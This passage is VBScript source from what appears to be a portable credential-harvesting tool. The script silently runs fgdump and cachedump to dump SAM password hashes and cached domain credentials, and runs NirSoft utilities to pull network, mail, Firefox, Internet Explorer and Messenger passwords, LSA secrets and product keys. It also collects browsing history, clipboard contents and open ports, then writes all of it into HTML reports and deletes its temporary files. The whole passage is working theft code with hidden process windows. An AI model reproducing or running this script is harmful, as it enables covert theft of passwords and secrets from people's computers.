For Each objProcess in colProcessList
objProcess.Terminate()
Next
End If
'\\ \\
'\\ End Watchdog Timer \\
'
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
Do Until objTextFile.AtEndOfStream
strarry = Split(objTextFile.ReadLine,":")
strline = ""
For i =0 To UBound(strarry)
strline = strline & "<td>" & strarry(i) & "</td>"
Next
objRightFile.WriteLine "<tr>" & strLine & "</tr>"
Loop
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
Else
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Result</b></td></tr>"
objRightFile.WriteLine "<td>Not Admin</td>"
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
End if
' +----------------------------------+
' + [Dump SAM FGDUMP] +
' +----------------------------------+
If ReadINI("SAM FGDUMP","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_9"" target=""right"">SAM FGDUMP</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_9""></a><font size=""3""><b>FGDump</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
If isAdmin then
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Username</b></td>" & _
"<td class=""colhead""><b>UID</b></td>" & _
"<td class=""colhead""><b>Encrypted password</b></td>" & _
"<td class=""colhead""><b>LAN Man Password Hash</b></td>" & _
"<td class=""colhead""><b>Windows NT Password Hash</b></td>" & _
"<td class=""colhead""><b>Full Name and Description</b></td>" & _
"<td class=""colhead""><b>Home directory</b></td></tr>"
'Change Directory
objShell.CurrentDirectory =strLogPath
objShell.Run U3 & "\fgdump.exe -c -k " , 0, False
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
'// 5 Second Watchdog Timer //
'// //
Secs = Now()
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'fgdump.exe'")
Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'fgdump.exe'")
Loop
If colProcessList.Count <> 0 Then
'kill process it shouldn't run this long
For Each objProcess in colProcessList
objProcess.Terminate()
Next
End If
'\\ \\
'\\ End Watchdog Timer \\
'
If objFSO.FileExists("127.0.0.1.pwdump") Then
Set objTextFile = objFSO.OpenTextFile("127.0.0.1.pwdump", FOR_READING)
Do Until objTextFile.AtEndOfStream
strarry = Split(objTextFile.ReadLine,":")
strline = ""
For i =0 To UBound(strarry)
strline = strline & "<td>" & strarry(i) & "</td>"
Next
objRightFile.WriteLine "<tr>" & strLine & "</tr>"
Loop
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
objShell.CurrentDirectory = U3
objTextFile.Close
Set objTextFile = Nothing
End If
WScript.Sleep CInt(Sleepms)
Else
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Result</b></td></tr>"
objRightFile.WriteLine "<td>Not Admin</td>"
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
End If
' +----------------------------------+
' + [Dump Network PW] +
' +----------------------------------+
If ReadINI("Network Password","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_10"" target=""right"">Network Password</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_10""></a><font size=""3""><b>Network Password</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "netpass.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
End If
' +----------------------------------+
' + [Dump Mail PW] +
' +----------------------------------+
If ReadINI("Mail Password","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_11"" target=""right"">Mail Password</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_11""></a><font size=""3""><b>Mail Password</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "mailpv.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
End if
' +----------------------------------+
' + [Dump Firefox PW] +
' +----------------------------------+
If ReadINI("Firefox Password","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_12"" target=""right"">Firefox Password(s)</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_12""></a><font size=""3""><b>Firefox Password</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Text Dump</b></td></tr>"
objShell.run "nircmd execmd FirePassword.exe >" & strFireFile,0 , True
'Nircmd is asynchronously we need to wait to ensure file written to
WScript.Sleep CInt(Sleepms)
If objFSO.FileExists(strFireFile) Then
Set objTextFile = objFSO.OpenTextFile(strFireFile, FOR_READING)
Do Until objTextFile.AtEndOfStream
objRightFile.WriteLine "<tr><td>" & objTextFile.ReadLine & "</td></tr>"
Loop
'End Table
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strFireFile,True
If Err <> 0 Then
Err.Clear
End If
End if
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End if
' +----------------------------------+
' + [Dump IE PW] +
' +----------------------------------+
If ReadINI("IE Password","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_13"" target=""right"">IE Password(s)</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_13""></a><font size=""3""><b>IE Password</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "iepv.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
End if
' +----------------------------------+
' + [Dump messenger PW] +
' +----------------------------------+
If ReadINI("Messenger Password","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_14"" target=""right"">Messenger Password(s)</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_14""></a><font size=""3""><b>Messenger Password</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "mspass.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
End if
' +----------------------------------+
' + [Dump Cache] +
' +----------------------------------+
If ReadINI("Cache","Enable",strIniFile) Then
Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2")
Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
isDomain = False
For Each objItem In colItems
isDomain = objItem.PartOfDomain 'post-Windows 2000 only
Next
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_15"" target=""right"">Cache</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_15""></a><font size=""3""><b>Cache Dump</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
If isDomain Then
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Results</b></td></tr>"
'Change Directory
objShell.CurrentDirectory =strLogPath
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\.\root\cimv2")
If ReadINI("Cache","Method",strIniFile)=1 Then
objShell.Run U3 & "\fgdump.exe -w -k " , 0, True
'// 5 Second Watchdog Timer //
'// //
Secs = Now()
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'fgdump.exe'")
Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'fgdump.exe'")
Loop
Else
objShell.Run U3 & "\cachedump.exe " , 0, True
Secs = Now()
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'cachedump.exe'")
Do Until (DateDiff("s", Secs, Now()) > 5) or colProcessList.Count = 0
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'cachedump.exe'")
Loop
End If
If colProcessList.Count <> 0 Then
'kill process it shouldn't run this long
For Each objProcess in colProcessList
objProcess.Terminate()
Next
End If
'\\ \\
'\\ End Watchdog Timer \\
'
If objFSO.FileExists("127.0.0.1.cachedump") Then
Set objTextFile = objFSO.OpenTextFile("127.0.0.1.cachedump", FOR_READING)
Do Until objTextFile.AtEndOfStream
objRightFile.WriteLine "<tr><td>" & objTextFile.ReadLine & "</td></tr>"
Loop
objTextFile.Close
Set objTextFile = Nothing
End If
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
objShell.CurrentDirectory = U3
Else
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Result</b></td></tr>"
objRightFile.WriteLine "<td>Not in a Domain</td>"
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
Set objWMIService = Nothing
Set colItems = Nothing
End if
' +----------------------------------+
' + [Dump LSA secrets] +
' +----------------------------------+
If ReadINI("LSA Secrets","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_16"" target=""right"">LSA Secrets</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_16""></a><font size=""3""><b>LSA Secrets</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "pspv.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End If
End if
' +----------------------------------+
' + [Dump Product Keys] +
' +----------------------------------+
If ReadINI("Product Keys","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_17"" target=""right"">Product Keys</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_17""></a><font size=""3""><b>Product Keys</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "produkey.exe /nosavereg /shtml " & strtmpFile & " /remote " & strComputerName, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End if
End if
' +----------------------------------+
' + [Dump URL History] +
' +----------------------------------+
If ReadINI("IE URL History","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_18"" target=""right"">IE URL History</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_18""></a><font size=""3""><b>URL History</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
set sh = createobject("Shell.Application")
Set history = sh.NameSpace(ssfHISTORY)
for each item in history.items
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Item</b></td>" & _
"<td class=""colhead""><b>Details</b></td></tr>"
objRightFile.WriteLine "<tr><td>" & history.GetDetailsOf(item,-1) & "</td></tr>"
If item.isFolder then
set itFol = item.GetFolder
for each item2 in itFol.items
arry = split(itFol.GetDetailsOf(item2,-1),vbcrlf)
objRightFile.WriteLine "<tr><td>" & arry(0) & "</td>"
For i = 1 To UBound(arry)
objRightFile.WriteLine "<td><a href=http://" & arry(i) & "> " & arry(i) & "</a></td>"
Next
objRightFile.WriteLine "</tr>"
Next
end if
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
Next
Set history = Nothing
Set sh = Nothing
End if
' +----------------------------------+
' + [Dump Updates-List] +
' +----------------------------------+
If ReadINI("Windows Updates List","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_19"" target=""right"">Updates List</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_19""></a><font size=""3""><b>Windows Updates</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "wul.exe /shtml " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
strLine = objTextFile.ReadLine
Do Until InStr(1,strLine,"<body>",1) Or objTextFile.AtEndOfStream
strLine = objTextFile.ReadLine
Loop
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
If InStr(1,strLine,"</body>",1) =0 Then
objRightFile.WriteLine strLine
End If
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End if
End if
' +----------------------------------+
' + [Firewall] +
' +----------------------------------+
If ReadINI("Firewall Status","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_20"" target=""right"">Firewall Status</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_20""></a><font size=""3""><b>Firewall Status</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Profile Type</b></td>" & _
"<td class=""colhead""><b>Firewall Enabled</b></td>" & _
"<td class=""colhead""><b>Exceptions Not Allowed</b></td>" & _
"<td class=""colhead""><b>Notifications Disabled</b></td>" & _
"<td class=""colhead""><b>Unicast responses to multicast broadcast disabled</b></td></tr>"
objRightFile.WriteLine "<tr><td>" & objFirewall.CurrentProfileType & "</td>"
If objPolicy.FirewallEnabled Then
objRightFile.WriteLine "<td bgcolor=""#00ff00"">True</td>"
Else
objRightFile.WriteLine "<td bgcolor=""#ff0000"">False</td>"
End If
objRightFile.WriteLine "<td>" & objPolicy.ExceptionsNotAllowed & "</td>"
objRightFile.WriteLine "<td>" & objPolicy.NotificationsDisabled & "</td>"
objRightFile.WriteLine "<td>" & objPolicy.UnicastResponsestoMulticastBroadcastDisabled & "</td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table></p>"
Set colPorts = objPolicy.GloballyOpenPorts
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Port Name</b></td>" & _
"<td class=""colhead""><b>Port Number</b></td>" & _
"<td class=""colhead""><b>IP Version</b></td>" & _
"<td class=""colhead""><b>Protocol</b></td>" & _
"<td class=""colhead""><b>Scope</b></td>" & _
"<td class=""colhead""><b>Remote Addresses</b></td>" & _
"<td class=""colhead""><b>Enabled</b></td>" & _
"<td class=""colhead""><b>Built-in</b></td></tr>"
For Each objPort in colPorts
objRightFile.WriteLine "<tr><td>" & objPort.Name & "</td>"
objRightFile.WriteLine "<td>" & objPort.Port & "</td>"
objRightFile.WriteLine "<td>" & objPort.IPVersion & "</td>"
objRightFile.WriteLine "<td>" & objPort.Protocol & "</td>"
objRightFile.WriteLine "<td>" & objPort.Scope & "</td>"
objRightFile.WriteLine "<td>" & objPort.RemoteAddresses & "</td>"
objRightFile.WriteLine "<td>" & objPort.Enabled & "</td>"
objRightFile.WriteLine "<td>" & objPort.Builtin & "</td></tr>"
Next
'End Table
objRightFile.WriteLine "</tbody></table></p>"
Set colApplications = objPolicy.AuthorizedApplications
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Authorized Application</b></td>" & _
"<td class=""colhead""><b>Enabled</b></td>" & _
"<td class=""colhead""><b>IP Version</b></td>" & _
"<td class=""colhead""><b>Process Image File Name</b></td>" & _
"<td class=""colhead""><b>Remote Addresses</b></td>" & _
"<td class=""colhead""><b>Scope</b></td></tr>"
For Each objApplication in colApplications
objRightFile.WriteLine "<tr><td>" & objApplication.Name & "</td>"
objRightFile.WriteLine "<td>" & objApplication.Enabled & "</td>"
objRightFile.WriteLine "<td>" & objApplication.IPVersion & "</td>"
objRightFile.WriteLine "<td>" & objApplication.ProcessImageFileName & "</td>"
objRightFile.WriteLine "<td>" & objApplication.RemoteAddresses & "</td>"
objRightFile.WriteLine "<td>" & objApplication.Scope & "</td></tr>"
Next
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
Set objFireWall = Nothing
Set ObjPolicy = Nothing
Set colPorts = Nothing
Set colApplications = Nothing
End if
' +----------------------------------+
' + [Port Scan] +
' +----------------------------------+
If ReadINI("Open Port Scan","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_21"" target=""right"">Open Port Scan</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_21""></a><font size=""3""><b>Local Port Scan</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objShell.Run "portqry -local -l " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Results</b></td></tr>"
Do Until objTextFile.AtEndOfStream
strLine = objTextFile.Readline
Select Case True
Case Left(strLine,3) = "PID"
'End Previous Table
objRightFile.WriteLine "</tbody></table>"
'Start New Table
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>PID</b></td>" & _
"<td class=""colhead""><b>Port</b></td>" & _
"<td class=""colhead""><b>Local IP</b></td>" & _
"<td class=""colhead""><b>State</b></td>" & _
"<td class=""colhead""><b>Remote IP: Port</b></td></tr>"
Case IsNumeric(Left(strline,1)) And InStr(1,strLine, "mappings found")=0
strarry = Split(Replace(strLine,vbTab&vbTab&vbTab,vbTab&vbTab),vbTab)
sText = ""
For i =0 To UBound(strarry)
sText = sText & "<td>" & strarry(i) & "</td>"
Next
objRightFile.WriteLine "<tr>" & sText & "</tr>"
bPorts = True
Case Else
If bPorts = True Then
objRightFile.WriteLine "</tbody></table>"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Results</b></td></tr>"
bPorts = False
End If
objRightFile.WriteLine "<tr><td>" & strLine & "</td></tr>"
End Select
Loop
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
End if
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End if
' +-----------------------------------+
' + Clipboard +
' +-----------------------------------+
If ReadINI("Clipboard","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_22"" target=""right"">Clipboard Contents</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_22""></a><font size=""3""><b>Clipboard Contents</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Contents</b></td></tr>"
objRightFile.WriteLine "<tr><td><pre>"
objShell.Run "nircmd.exe clipboard addfile " & strtmpFile, 0, True
If objFSO.FileExists(strtmpFile) Then
Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING)
Do Until objTextFile.AtEndOfStream
objRightFile.WriteLine objTextFile.ReadLine
Loop
'End Table
objTextFile.Close
Set objTextFile = Nothing
objFSO.DeleteFile strtmpFile,True
If Err <> 0 Then
Err.Clear
End If
End if
objRightFile.WriteLine "</pre></td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
'WScript.Sleep 1000
End if
' +-----------------------------------+
' + Win Audit +
' +-----------------------------------+
If ReadINI("Win Audit","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_23"" target=""right"">WinAudit</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_23""></a><font size=""3""><b>Parmavex WinAudit</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Status</b></td></tr>"
cmdline = ReadINI("Win Audit","cmdline",strIniFile)
objShell.Run "WinAudit.exe " & cmdline & _
" /f=" & strLogPath & "\" & "WinAudit-[" & strDate & "-" & strTime & "]" & _
" /l=" & strLogPath & "\WinAudit.log", 0, True
objRightFile.WriteLine "<tr><td>"& "WinAudit.exe " & cmdline & _
" /f=" & strLogPath & "\" & "WinAudit-[" & strDate & "-" & strTime & "]" & _
" /l=" & strLogPath & "\WinAudit.log" & "</td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
' +----------------------------------+
' + [XP ACTIVATION] +
' +----------------------------------+
If ReadINI("WPA","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_24"" target=""right"">XP Activation</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_24""></a><font size=""3""><b>XP Activation</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Status</b></td></tr>"
If objFSO.FileExists(objShell.ExpandEnvironmentStrings("%SystemRoot%") & "\system32\wpa.dbl") Then
objFSO.CopyFile objShell.ExpandEnvironmentStrings("%SystemRoot%") & "\system32\wpa.dbl",strCurLog & "\"
objRightFile.WriteLine "<tr><td>This file is an activation backup and will only function when installed on the original machine that has had no hardware" & _
" modifications. Boot the unit to safemode and copy the file to the System32 folder and restart.</td></tr>"
Else
objRightFile.WriteLine "<tr><td>File Not Found</td></tr>"
End If
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
' +-----------------------------------+
' + Cleanup +
' +-----------------------------------+
objShell.CurrentDirectory = strLogPath
objFSO.DeleteFile strtmpFile,True
If ReadINI("SAM FGDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM FGDUMP","Enable",strIniFile)= 1 Then
objFSO.DeleteFile "127.0.0.1.pwdump",True
End If
If ReadINI("SAM PWDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM PWDUMP","Enable",strIniFile)= 1 Then
objFSO.DeleteFile "127.0.0.1.pwdump",True
End If
If ReadINI("Cache","KeepFile",strIniFile)= 0 AND ReadINI("Cache","Enable",strIniFile)= 1 Then
objFSO.DeleteFile "127.0.0.1.cachedump",True
End If
objFSO.DeleteFile strFireFile,True
objShell.CurrentDirectory =U3
' +-----------------------------------+
' + NirTone +
' +-----------------------------------+
If ReadINI("Nirtone","Enable",strIniFile) Then
objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_99"" target=""right"">NirTones</a></b></td></tr>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine"<p><a name=""cat_99""></a><font size=""3""><b>NirCmd Beep</b></font></p>"
objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">"
objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _
"<td class=""colhead""><b>Status</b></td></tr>"
objShell.Run "nircmd.exe beep " & ReadINI("Nirtone","Tone_1",strIniFile) , 0, True
objShell.Run "nircmd.exe beep " & ReadINI("Nirtone","Tone_2",strIniFile) , 0, True
objRightFile.WriteLine "<tr><td>Played</td></tr>"
'End Table
objRightFile.WriteLine "</tbody></table></p><p> </p>"
End If
'::LEFT END HTML
